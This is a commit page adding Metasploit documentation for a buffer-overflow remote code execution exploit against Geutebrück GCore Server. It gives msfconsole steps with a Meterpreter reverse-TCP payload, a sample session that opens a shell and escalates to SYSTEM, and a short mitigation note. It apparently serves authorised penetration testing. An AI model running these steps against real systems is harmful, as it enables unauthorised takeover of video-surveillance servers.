Skip to content

Commit 7705472

Browse files
author
Maurice Popp
committed
added documentation, and fixed 4 to 2 indentation
1 parent c187f70 commit 7705472

File tree

2 files changed

+318
-255
lines changed

2 files changed

+318
-255
lines changed

documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md

Lines changed: 63 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,63 @@
1+
## Vulnerable Application
2+
3+
Geutebrück GCore Server 1.3.8.42,1.4.2.37 are vulnerable to a buffer overflow exploitation. Since this application is started with system privileges this allows a system remote code execution.
4+
5+
## Verification Steps
6+
7+
1. Install Windows as basic OS (Tested with Win2012R2,Windows 7)
8+
2. Install the Geutebrück GCore server
9+
3. Verify that http://<your target ip>:13003/statistics/runningmoduleslist.xml available is.
10+
4. Start msfconsole
11+
5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]```
12+
6. Do: ```set rhost <your target ip>```
13+
7. Do: ```set rport 13003``
14+
8. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
15+
9. Do: ```exploit```
16+
10. You should get a shell as NT/SYSTEM.
17+
18+
## Scenarios
19+
```
20+
msf exploit(geutebrueck_gcore_x64_rce_bo) > show options
21+
22+
Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo):
23+
24+
Name Current Setting Required Description
25+
---- --------------- -------- -----------
26+
RHOST 192.168.1.10 yes The target address
27+
RPORT 13003 yes The target port
28+
29+
30+
31+
Payload options (windows/x64/meterpreter/reverse_tcp):
32+
33+
Name Current Setting Required Description
34+
---- --------------- -------- -----------
35+
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
36+
LHOST 192.168.1.11 yes The listen address
37+
LPORT 4444 yes The listen port
38+
39+
40+
Exploit target:
41+
42+
Id Name
43+
-- ----
44+
0 Automatic Targeting
45+
46+
msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit
47+
[*] Started reverse TCP handler on 192.168.1.11:4444
48+
[*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml...
49+
[*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)
50+
[*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37!
51+
[*] 192.168.1.10:13003 - Crafting Exploit...
52+
[*] 192.168.1.10:13003 - Exploit ready for sending...
53+
[*] 192.168.1.10:13003 - Exploit sent! [*] Sending stage (1188415 bytes) to
54+
[*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200
55+
[*] 192.168.1.10:13003 - Closing socket.
56+
meterpreter > getsystem
57+
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
58+
meterpreter > getuid Server username:
59+
NT-AUTORITÄT\SYSTEM
60+
meterpreter >
61+
```
62+
## Mitigation
63+
Geutebrück released a new Version and an update for the affected version which should be installed to fix the described vulnerabilities.

0 commit comments

Comments
 (0)